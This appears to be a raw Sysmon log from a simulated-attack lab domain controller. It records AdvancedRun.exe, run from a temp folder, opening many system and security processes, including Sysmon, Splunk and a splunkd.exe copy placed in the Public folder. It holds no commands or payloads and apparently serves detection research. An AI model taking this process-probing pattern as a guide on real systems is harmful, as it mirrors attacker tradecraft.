20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
